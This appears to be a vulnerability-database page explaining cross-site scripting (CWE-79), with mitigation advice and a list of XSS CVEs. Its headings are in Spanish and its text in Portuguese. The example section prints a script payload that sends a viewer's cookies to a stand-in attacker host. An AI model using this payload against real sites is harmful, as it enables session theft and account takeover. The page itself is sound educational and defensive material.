Fallos del tipo CWE-79

29.071 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2020-36637LOWChris92de AdminServ adminserv.php cross site scriptingEPSS 0.5%CVE-2024-2773LOWCampcodes Online Marriage Registration System search.php cross site scriptingEPSS 0.5%CVE-2023-24230MEDIUMA stored cross-site scripting (XSS) vulnerability in the component /formwork/panel/dashboard of Formwork v1.12.1 allows attackers to executeEPSS 0.5%CVE-2022-37309MEDIUMOX App Suite through 7.10.6 allows XSS via script code within a contact that has an e-mail address but lacks a name.EPSS 0.5%CVE-2022-3440MEDIUMRock Convert < 2.6.0 - Reflected Cross-Site ScriptingEPSS 0.5%CVE-2020-36638LOWChris92de AdminServ adminserv.php cross site scriptingEPSS 0.5%CVE-2026-84942MEDIUMStored Cross-Site Scripting via Vega Expression Function Bypass in OpenSearch DashboardsEPSS 0.5%CVE-2022-37308MEDIUMOX App Suite through 7.10.6 allows XSS via HTML in text/plain e-mail messages.EPSS 0.5%CVE-2021-44760MEDIUMWordPress WP-DownloadManager plugin <= 1.68.6 - Auth. Reflected Cross-Site Scripting (XSS) vulnerabilityEPSS 0.5%CVE-2022-31469MEDIUMOX App Suite through 7.10.6 allows XSS via a deep link, as demonstrated by class="deep-link-app" for a /#!!&app=%2e./ URI.EPSS 0.5%CVE-2025-9642HIGHImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in GitLabEPSS 0.5%CVE-2023-28471MEDIUMConcrete CMS (previously concrete5) in versions 9.0 through 9.1.3 is vulnerable to Stored XSS via a container name.EPSS 0.5%CVE-2022-32167MEDIUMCloudreve - Stored XSSEPSS 0.5%CVE-2023-28429MEDIUMPimcore has Cross-site Scripting vulnerability in DataObject tooltip fieldEPSS 0.5%CVE-2021-37386HIGHFurukawa Electric LatAm 423-41W/AC before v1.1.4 and LD421-21W before v1.3.3 were discovered to contain an HTML injection vulnerability via EPSS 0.5%CVE-2022-3139MEDIUMWe’re Open! < 1.42 - Admin+ Stored Cross-Site ScriptingEPSS 0.5%CVE-2025-3397MEDIUMYzmCMS message.tpl cross site scriptingEPSS 0.5%CVE-2022-4560LOWJoget wflow-core UniversalTheme.java getInternalJsCssLib cross site scriptingEPSS 0.5%CVE-2022-39050MEDIUMPossible XSS stored in customer informationEPSS 0.5%CVE-2022-4525LOWNational Sleep Research Resource sleepdata.org cross site scriptingEPSS 0.5%